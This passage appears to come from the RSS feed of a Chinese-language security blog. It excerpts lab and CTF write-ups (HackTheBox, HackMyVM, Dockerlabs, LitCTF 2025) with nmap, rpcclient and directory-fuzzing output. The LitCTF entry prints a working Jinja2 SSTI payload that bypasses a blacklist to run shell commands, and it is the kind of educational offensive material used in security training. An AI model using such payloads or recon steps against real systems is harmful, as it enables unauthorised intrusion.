&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;tech-detect:jsdelivr&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;tech-detect:bootstrap&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;apache-detect&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2 &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;Apache/2.4.49 (Unix)&amp;#34;&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;options-method&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;http&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;info&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; http://172.17.0.2 &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;GET,POST,OPTIONS,HEAD,TRACE&amp;#34;&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;cve-2021-41773&#34;&gt;CVE-2021-41773&lt;/h2&gt;
&lt;p&gt;经过信息收集，得到以下命令执行的方式&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Fluffy</title>
      <link>https://www.hyhforever.top/posts/2025/05/htb-fluffy/</link>
      <pubDate>Thu, 29 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/htb-fluffy/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficulty&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Windows&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: &lt;code&gt;j.fleischman&lt;/code&gt; / &lt;code&gt;J0elTHEM4n1990!&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/Fluffy  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap Fluffy.htb -sV -T4                                                                                           
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT     STATE SERVICE       VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;53/tcp   open  domain        Simple DNS Plus
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;389/tcp  open  ldap          Microsoft Windows Active Directory LDAP &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Domain: fluffy.htb0., Site: Default-First-Site-Name&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;445/tcp  open  microsoft-ds?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;464/tcp  open  kpasswd5?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Domain: fluffy.htb0., Site: Default-First-Site-Name&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3268/tcp open  ldap          Microsoft Windows Active Directory LDAP &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Domain: fluffy.htb0., Site: Default-First-Site-Name&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Domain: fluffy.htb0., Site: Default-First-Site-Name&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;SSDP/UPnP&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;添加&lt;code&gt;dc01.fluffy.htb&lt;/code&gt;到&lt;code&gt;/etc/host&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Puppy</title>
      <link>https://www.hyhforever.top/posts/2025/05/htb-puppy/</link>
      <pubDate>Wed, 28 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/htb-puppy/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Difficult&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Windows&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in real life pentests, you will start the Puppy box with credentials for the following account: &lt;code&gt;levi.james&lt;/code&gt; / &lt;code&gt;KingofAkron2025!&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-shell&#34; data-lang=&#34;shell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/Puppy  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap puppy.htb -sV   
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT     STATE SERVICE       VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;53/tcp   open  domain        Simple DNS Plus
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;88/tcp   open  kerberos-sec  Microsoft Windows Kerberos 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;111/tcp  open  rpcbind       2-4 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;RPC &lt;span class=&#34;c1&#34;&gt;#100000)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;135/tcp  open  msrpc         Microsoft Windows RPC
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;389/tcp  open  ldap          Microsoft Windows Active Directory LDAP &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Domain: PUPPY.HTB0., Site: Default-First-Site-Name&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;445/tcp  open  microsoft-ds?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;464/tcp  open  kpasswd5?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;636/tcp  open  tcpwrapped
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;2049/tcp open  nlockmgr      1-4 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;RPC &lt;span class=&#34;c1&#34;&gt;#100021)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3260/tcp open  iscsi?
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3268/tcp open  ldap          Microsoft Windows Active Directory LDAP &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;Domain: PUPPY.HTB0., Site: Default-First-Site-Name&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;3269/tcp open  tcpwrapped
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 &lt;span class=&#34;o&#34;&gt;(&lt;/span&gt;SSDP/UPnP&lt;span class=&#34;o&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;rpc&#34;&gt;RPC&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-shell&#34; data-lang=&#34;shell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/Puppy  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ rpcclient 10.xx.xx.xx -U levi.james                                                                                                         ⏎
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Password &lt;span class=&#34;k&#34;&gt;for&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;WORKGROUP&lt;span class=&#34;se&#34;&gt;\l&lt;/span&gt;evi.james&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;rpcclient $&amp;gt; enumdomusers 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;Administrator&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x1f4&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;Guest&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x1f5&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;krbtgt&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x1f6&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;levi.james&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x44f&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;ant.edwards&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x450&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;adam.silver&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x451&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;jamie.williams&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x452&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;steph.cooper&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x453&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;user:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;steph.cooper_adm&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; rid:&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;0x457&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;rpcclient $&amp;gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;得到一个用户列表&lt;/p&gt;</description>
    </item>
    <item>
      <title>LitCTF-2025</title>
      <link>https://www.hyhforever.top/posts/2025/05/litctf-2025/</link>
      <pubDate>Mon, 26 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/litctf-2025/</guid>
      <description>&lt;h1 id=&#34;litctf2025&#34;&gt;LITCTF2025&lt;/h1&gt;
&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h3 id=&#34;星愿信箱&#34;&gt;星愿信箱&lt;/h3&gt;
&lt;p&gt;经过测试是SSTI，可以通过设置变量绕过黑名单&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code class=&#34;language-jinja2&#34; data-lang=&#34;jinja2&#34;&gt;{% set os = (lipsum | attr(&amp;#39;__globals__&amp;#39;)) | attr(&amp;#39;get&amp;#39;)(&amp;#39;os&amp;#39;) %}
{% set popen = os | attr(&amp;#39;popen&amp;#39;) %}
{% set input_cmd = &amp;#34;head /flag&amp;#34; %}
{% set cmd = popen(input_cmd).read() %}
{% print cmd %}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/05/litctf-2025/images/image-20250525203547160.png&#34; data-caption=&#34;image-20250525203547160&#34;&gt;
&lt;img alt=&#34;image-20250525203547160&#34; loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/05/litctf-2025/images/image-20250525203547160.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;nest_js&#34;&gt;nest_js&lt;/h3&gt;
&lt;p&gt;弱密码，登录就有&lt;code&gt;flag&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>HackMyVM-Homelab</title>
      <link>https://www.hyhforever.top/posts/2025/05/hackmyvm-homelab/</link>
      <pubDate>Sat, 17 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/hackmyvm-homelab/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/homelab  
❯ nmap 192.168.55.41 -sV -A -p- 

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.62 ((Unix))
|_http-favicon: Apache on Mac OS X
|_http-title: Mac OS X Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.62 (Unix)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;只有&lt;code&gt;80&lt;/code&gt;端口开放了&lt;/p&gt;
&lt;h2 id=&#34;dir-fuzz&#34;&gt;Dir Fuzz&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/homelab  
❯ dirsearch -u http://192.168.55.41  

  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                
 (_||| _) (/_(_|| (_| )                                                                                                                         
                                                                                                                                                
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289

Target: http://192.168.55.41/

[04:47:54] Scanning:                                                                                                                            
[04:48:00] 200 - 820B - /cgi-bin/printenv                                 
[04:48:00] 200 - 1KB - /cgi-bin/test-cgi                                 
[04:48:01] 200 - 4KB - /error.html                                       
[04:48:01] 200 - 8KB - /favicon.ico                                      
[04:48:02] 200 - 5KB - /index.html                                       
[04:48:05] 301 - 313B - /script  -&amp;gt;  http://192.168.55.41/script/         
[04:48:05] 403 - 276B - /script/
[04:48:06] 301 - 314B - /service  -&amp;gt;  http://192.168.55.41/service/       
[04:48:06] 301 - 319B - /service?Wsdl  -&amp;gt;  http://192.168.55.41/service/?Wsdl
[04:48:06] 301 - 312B - /style  -&amp;gt;  http://192.168.55.41/style/           
[04:48:10] 403 - 276B - /server-status/                                    
[04:48:11] 403 - 276B - /server-status

Task Completed                                                                                                                                  

[root@kali] /home/kali/homelab  
❯ curl http://192.168.55.41/service/      
Whoa! But sorry, this service is only available for myself!#                                                                                    
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;看到有一个&lt;code&gt;service&lt;/code&gt;路径，但是好像需要认证&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dockerlabs-Ciberguard</title>
      <link>https://www.hyhforever.top/posts/2025/05/dockerlabs-ciberguard/</link>
      <pubDate>Tue, 13 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/dockerlabs-ciberguard/</guid>
      <description>&lt;h2 id=&#34;machine-info&#34;&gt;Machine Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Medium&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/ciberguard  
❯ nmap 172.17.0.2 -sV -A -p- 

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:f6:3a:98:23:dc:8b:00:f0:5c:d5:50:07:f9:ec:e7 (ECDSA)
|_  256 b0:4e:cb:2a:e0:ac:cf:4c:14:7b:23:57:00:6d:12:1d (ED25519)
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: CyberGuard - Seguridad Digital
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;feroxbuster&#34;&gt;Feroxbuster&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;[root@kali] /home/kali/ciberguard  
❯ feroxbuster -u &amp;#39;http://172.17.0.2/&amp;#39; -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt   
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben &amp;#34;epi&amp;#34; Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://172.17.0.2/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, txt]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      309c http://172.17.0.2/images =&amp;gt; http://172.17.0.2/images/
200      GET       77l      154w     2111c http://172.17.0.2/archiv/script.js
200      GET      311l      560w     5015c http://172.17.0.2/archiv/styles.css
200      GET      231l     1204w   142716c http://172.17.0.2/images/Imagen(1).jpg
200      GET       59l      323w    28431c http://172.17.0.2/images/Image.jpg
200      GET      103l      363w     5100c http://172.17.0.2/
200      GET      279l     1484w   159900c http://172.17.0.2/images/Imagen%282%29.jpg
200      GET       12l      114w     7473c http://172.17.0.2/images/Iconn.png
200      GET      190l     1007w    91180c http://172.17.0.2/images/Imagen%285%29.png.jpg
200      GET      195l     1148w   120954c http://172.17.0.2/images/Imagen%283%29.jpg
200      GET      243l     1220w   121023c http://172.17.0.2/images/Imagen%284%29.jpg
200      GET      231l     1204w   142716c http://172.17.0.2/images/Imagen%281%29.jpg
301      GET        9l       28w      309c http://172.17.0.2/archiv =&amp;gt; http://172.17.0.2/archiv/
403      GET        9l       28w      275c http://172.17.0.2/server-status
[####################] - 29s   661689/661689  0s      found:14      errors:1341   
[####################] - 28s   661638/661638  23558/s http://172.17.0.2/ 
[####################] - 0s    661638/661638  3576422/s http://172.17.0.2/images/ =&amp;gt; Directory listing (add --scan-dir-listings to scan)
[####################] - 0s    661638/661638  330819000/s http://172.17.0.2/archiv/ =&amp;gt; Directory listing (add --scan-dir-listings to scan) 
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id=&#34;own-chloe&#34;&gt;Own chloe&lt;/h2&gt;
&lt;p&gt;查看到目录下有一个**/archiv/script.js**&lt;/p&gt;</description>
    </item>
    <item>
      <title>HTB-Planning</title>
      <link>https://www.hyhforever.top/posts/2025/05/htb-planning/</link>
      <pubDate>Mon, 12 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/htb-planning/</guid>
      <description>&lt;h2 id=&#34;box-info&#34;&gt;Box Info&lt;/h2&gt;
&lt;table&gt;
  &lt;thead&gt;
      &lt;tr&gt;
          &lt;th&gt;OS&lt;/th&gt;
          &lt;th&gt;Linux&lt;/th&gt;
      &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
      &lt;tr&gt;
          &lt;td&gt;Difficulty&lt;/td&gt;
          &lt;td&gt;Easy&lt;/td&gt;
      &lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As is common in real life pentests, you will start the Planning box with credentials for the following account: &lt;code&gt;admin&lt;/code&gt; / &lt;code&gt;0D5oT70Fq13EvB5r&lt;/code&gt;&lt;/p&gt;
&lt;h2 id=&#34;nmap&#34;&gt;Nmap&lt;/h2&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;o&#34;&gt;[&lt;/span&gt;root@kali&lt;span class=&#34;o&#34;&gt;]&lt;/span&gt; /home/kali/Planning  
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;❯ nmap planning.htb -sV -A                 
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;PORT   STATE SERVICE VERSION
